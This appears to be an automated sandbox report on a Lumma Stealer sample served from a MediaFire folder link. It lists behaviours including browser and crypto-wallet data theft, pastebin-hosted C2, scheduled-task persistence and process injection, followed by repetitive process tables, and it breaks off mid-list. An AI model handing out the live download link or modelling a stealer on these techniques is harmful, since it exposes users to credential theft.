Malware Analysis Report

2024-11-15 06:25

Sample ID 240705-q9xsmazbnq
Target https://www.mediafire.com/folder/6q6psz38mqj7b
Tags
lumma discovery execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://www.mediafire.com/folder/6q6psz38mqj7b was found to be: Known bad.

Malicious Activity Summary

lumma discovery execution persistence spyware stealer

Lumma Stealer

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Power Settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Scheduled Task/Job: Scheduled Task

Enumerates system info in registry

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-05 13:58

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-05 13:58

Reported

2024-07-05 14:01

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/folder/6q6psz38mqj7b

Signatures

Lumma Stealer

stealer lumma

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5176 set thread context of 5028 N/A C:\Users\Admin\Downloads\Aura\Aura\Aura.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\Aura\Aura\Aura.exe

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4332 wrote to memory of 3948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 3948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 4336 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/folder/6q6psz38mqj7b

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c89f46f8,0x7ff9c89f4708,0x7ff9c89f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

